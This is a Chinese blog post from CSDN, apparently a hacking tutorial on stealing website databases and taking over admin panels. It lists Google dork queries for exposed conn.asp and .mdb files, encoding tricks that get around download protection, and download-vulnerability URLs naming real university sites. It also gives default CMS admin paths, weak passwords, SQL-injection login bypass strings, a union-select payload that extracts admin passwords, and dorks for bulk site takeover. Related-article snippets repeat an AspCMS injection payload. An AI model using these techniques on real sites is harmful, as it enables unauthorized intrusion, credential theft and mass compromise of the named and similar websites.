渗透漏洞分析--沙窝李的王

最新推荐文章于 2023-02-17 16:51:27 发布
最新推荐文章于 2023-02-17 16:51:27 发布
阅读量1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43600412/article/details/92853136
版权

弱漏洞利用网站

网站暴库漏洞

暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL—>数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地,

hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞)

利用方法

inurl:/inc/conn.asp

inurl:inc+conn.asp to parent directort intext:

inurl:/inc/conn.asp

inurl:/inc+conn.asp to parent dirctory

所有可以目录浏览的网页都有一些相同的地方,主要有以下几点:

to parent directory

last madifief Description

转到父目录

而利用Google语法来搜索的语句有:

intitle  intext  inurl  site  filetype等

搜索域名后缀,常见的域名后缀有:

com  net  mil  org  info  gov  edu  biz  coop  areo  pro  int  arpa

e.g

intext:to parent directory + intext:mdb site:fudan.edu.cn

inc/conn.asp—>inc%5cconn.asp(MySQL数据库与可能的路径)

暴库绕过、过防下载

#sdsf.mdb

下载时改成 %23sdsf.mdb

#@!$%^&*asfkladsf@!#.mdb

%23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb

高级语法暴库

inurl:./… admin …/… add…

inurl:./… admin…/…del…

inurl:/.asp <id=<%<%<%

下载漏洞

http://ipo.snnu.edu.cn/

http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc

http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc

http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc

下载漏洞利用

通过蜘蛛爬行,找到该URL,下载conn.asp  config.php  config.asp  db.mdb

网站后台密码爆破(弱口令 bp)

为了方便管理网站,cms系统畅游管理员后台管理接口,输入账号密码登录进行管理

常见后台

网站常见的cms管理系统有:

织梦  idscuz  帝国  phpweb  WordPress  aspcms  科讯  南方  良精  ecshop等

对应的后台:

dede  admin.php  e/admin  admin.php  wp-admin  admin  admin  admin  admin  admin

还有可能:manager  login_admin  login_manage  login.asp

弱口令猜解

常见弱口令:admin  admin888  admin123  123456等等

逻辑万能秘钥:

asp–> ‘ro’ = ‘or’

php–> admin’ or 1=1==  admin’ or ‘1’='1

破解工具:burpsuite  discuz破解器  py脚本  httpfuzzer(针对带验证码的)

针对性的一些工具:PKav HTTP Fuzzer

将找到的请求包放进去(请求地址,请求包),对密码部分添加标记,对验证码部分添加标记,然后暴力破解。

网站漏洞EXP的利用

EXP是exploit(漏洞利用)的缩写。当我们cms出现漏洞的时候,针对漏洞原理可以写出针对该漏洞的exploit。

有的时候exp可以直接添加管理员或者getshell,爆出管理员账号密码,数据库账号密码。

EXP利用

主流网站基本上都有漏洞和exp

e.g 织梦  phpcms  strusl  phpweb …

EXP收集

百度  交流  利用工具

批量检测站点

常用于某一类型的漏洞站点的安全检测

批量拿站

关键词:

有限公司 – powered by AspCMS v2.0

powered by AspCms 2

powered by AspCms 2.0

AspCms 2.0

powere

关键字:inurl:newgoods.asp:action_key_order=news

利用方法:admin_shopxp/upLoad_bm.asp

漏洞利用:phpweb漏洞

关键字:

inurl:/class/?1.html

inurl:class/index.php?catid=0

inurl:/page/html/?1.html

inurl:news/html/?411.htm

默认后台地址:/admin.php

注入地址:

down/class/index.php?myord=1

news/class/index.php?showtag=

万能密码  admin ‘or ‘1’ =’ 1

织梦批量,搜索关键字:

powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC

inurl:shopxp_news.asp

TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

沙窝李
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试漏洞类型分析与自动化渗透测试工具介绍
weixin_51337717的博客
04-05 821
渗透测试漏洞类型解析 漏洞分析 按照攻击方法分类 本地攻击(缓冲区溢出): 本地命令执行(应用),本地命令执行(文件),权限提升 远程攻击(缓冲区溢出): 远程代码执行(端口),非授权信息泄露,网络劫持 DDOS攻击: 资源耗尽型,导致异常型 WEBAPP 攻击: 注入(SQL,XXE等),越权访问,XXS,逻辑分析,不安全的反序列化 WEB 漏洞介绍 漏洞 介绍 注入 注入漏洞是一组安全漏洞,当可疑数据作为命令或查询插入到应用程序中时会发生 失效的身份认证 当应用程序的功能未正确实现
渗透学习 漏洞分析
weixin_46601374的博客
04-01 242
总不能因为这世上有人跟你道不同,你就不好好走自己的路呀 小白入坑学废集7常见的漏洞分析工具NMAP端口扫描之——NMAP主机探测端口扫描扫描端口状态TCP扫描(-sT)SYN扫描(-sS)端口扫描探测目标主机的操作系统密码破解漏洞探测防火墙躲避绕过AWVSAWVS常见功能爬虫功能NetsparkerAppscanJskySafe3WVS椰树BurpsuiteProxySpiderScannerIntruderRepeaterDecoderComparer黑客的迂回“打法”旁站旁站收集常用收集工具漏洞扫描
渗透漏洞分析--沙窝里的
weixin_43600412的博客
06-19 539
漏洞分析有好多工具,我偏爱nmap与burpsuite 上次忘了写nmap专篇博客,恰好补上。 工具:nmap 1.检测开机在网络上的主机(主机发现) 2.检测主机上开放的端口(端口发现或枚举) 3.检测到相应的端口(服务发现) 4.软件版本检测脆弱性的漏洞(Nmap的脚本) nmap常用参数 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信...
渗透测试面经之——渗透测试与漏洞分析
Alexz__的博客
03-22 5250
渗透测试与漏洞分析 owasp top10漏洞 SQL注入 失效的身份认证和会话管理 跨站脚本攻击 XSS 直接引用不安全的对象 安全配置错误 敏感信息泄露 缺少功能级的访问控制 跨站请求伪造 CSRF 使用含有已知漏洞的组件 未验证...
渗透测试流程(二) 威胁建模、漏洞分析漏洞利用阶段
ShouYWang的博客
02-17 994
本篇文章将介绍渗透测试中最为精彩的渗透利用阶段
zaxiong tanhan hantou -crx插件
04-04
鹿邑邮交新滩头泉鹿前禅坛沙窝汤榭轮衣。yi。。。。。。。。。。。。。。。。。 碧皇城北ba坝前线仔霞飞章魏兴沙汉庄顺沟博山中交坑北仑九吉米林乔顺崖头伦本鲁林。 丹窝潭芝to头城hui会bid bid bid go go an uan od...
消防设施设备台账登记表-(1).doc
12-02
沙窝小学的这份消防设施设备台账登记表,旨在规范学校的安全管理工作,确保校园内的消防设施完好、功能正常,保障师生的生命安全。 1. 学校负责人姓名和联系方式:这是应急响应的关键信息,一旦发生火警或其他...
沙窝中学慢性病综合防控实施计划方案.doc
12-05
沙窝中学慢性病综合防控实施计划方案.doc
精品资料(2021-2022年收藏)农产品品牌形象的构成要素及其实证研究.doc
10-10
此外,天津各地利用地理资源发展特色农产品,如沙窝萝卜、抬头西瓜等。 【品牌形象构成要素】 文章将农产品品牌形象分为产品形象和企业形象两大维度,其中产品形象包括品质、品种、包装等,企业形象则涵盖信誉、...
服务业单店沙盘模拟训练实验室方案
06-08
第四部分 沙窝--沙盘模拟训练实验室特点 4 第五部分 沙窝公司沙盘模拟实验室方案 5 5.1沙盘训练实验中心建设配置 5 5.11硬件设施: 5 5.12软件设施: 5 5.13教学资料: 6 5.14管理制度: 6 5.2实验室交付方案 6 5.21...
CMS(TWCMS) v2.0.3 20140505
10-24
TWCMS是由中国首家网络营销策划机构通科技推出,免费开源。是国内首家同时推出:高性能轻量级开源框架(KongPHP框架)、高性能轻量级模板引擎、高性能轻量级开源CMS的公司。是国内首款支持亿级负载的轻量级CMS。是国内首款负载能力远超discuz、phpwind等论坛程序的CMS。TWCMS的特点:1:体积小功能强轻量级网站内容管理系统 TWCMS体积小巧,安装包不到1M,简洁精干,没有冗长的代码,没有华丽的视觉效果,没有不必要的功能,我们注重实用性,主程序只做最核心,最实用的功能,当然,不做不代表不能实现,其它的功能可以通过我们强大的插件来实现。2:速度快性能高TWCMS一直追求程序的速度和性能,程序框架采用懒加载、分布式服务器的设计,每张表都可有自己的DB服务器群和CACHE服务器(群),单表都能承受亿级数据,运行速度快,根据官方测试:TWCMS在亿级数据依然在0.0x秒,而在APC的环境,亿级数据在0.00x秒。3:高安全够稳定我们深知安全对于一款CMS的重要性,TWCMS基于自主研发的开源框架KONGPHP开发,安全高效,为进一步保证程序的安全性,我们邀请“乌云漏洞平台”、
3种常见的渗透测试漏洞总结,快来收藏√
测试官
12-07 624
越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。
墨者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 757
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
WEB攻防-asp安全
worryanswer的博客
08-11 771
web攻防-ASP安全
aspcms各版本漏洞0day集合
weixin_33889665的博客
11-03 2145
admin/_content/_About/AspCms_AboutEdit.asp?id=19and1=2unionselect1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24fromaspcms_userwhereuserid=1———————————...
aspcms cookies欺骗和后台无验证注入
qq_38807738的博客
06-23 3168
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!————————后台注射———————— http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname...
【原创】风讯DotNetCMS V1.0~V2.0 SQL注入漏洞
weixin_33850890的博客
11-09 494
  文章作者:rebeyond  注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到乌云-漏洞报告平台。I.S.T.O版权所有,转载需注明作者。  受影响版本:貌似都受影响。  漏洞文件:user/City_ajax.aspx  漏洞分析:这个页面里的getCityList函数,通过用户传入的CityId参数来进行省份和城市查询。请求,都没有进行权限的验证,游客权限就可以调用其中...
渗透测试漏洞类型解析
weixin_52514668的博客
04-05 3327
渗透测试漏洞类型解析 一、漏洞分类 (1)按照攻击对象分类: 操作系统:Linux. windows. IOS. Andriod 网络设备:路由器 交换机 防火墙 无线网络设备 Web:PHP. ASPX. JSP. HTML. JS. 数据库 … 服务类软件:FTP. SMTP. SSH. POP3. AD. SMB. RDP. 其他自编服务 物联网设备:PLC. RFID. GPS. 基站 打印机 摄像头 智能探测器(手表) (2)按照攻击方法分类 本地攻击(缓冲区溢出):本地命令执行(...
渗透知识-解析漏洞
Jian Sun_的博客
02-08 723
Web安全 - 解析漏洞 一、原理 解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。 二、Apache 1. 多后缀解析 一个文件名为 test.x1.x2.x3 的文件,Apache会从x3的位置往x1的位置开始尝试解析,如果x3不属于 Apache解析的扩展名,那么Apache会尝试去解析x2, 这样一直往前尝试,直到遇到一个能解析的扩展名为止。 例如:Web应用限制了php等敏感后缀,我们通过可以上传一个文件名为
接着刚刚的问题,我的数据类型符合要求,但还会有报错,如:当前地点: ('沙窝', [116.03895, 39.7572, 1]) 坐标不存在
最新发布
05-10
这个报错可能是由于你的代码中没有处理地点不存在的情况而引起的。可以尝试添加一些异常处理来解决这个问题,例如: ```python try: # 根据用户输入的地点查询坐标 location = get_location(user_input) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值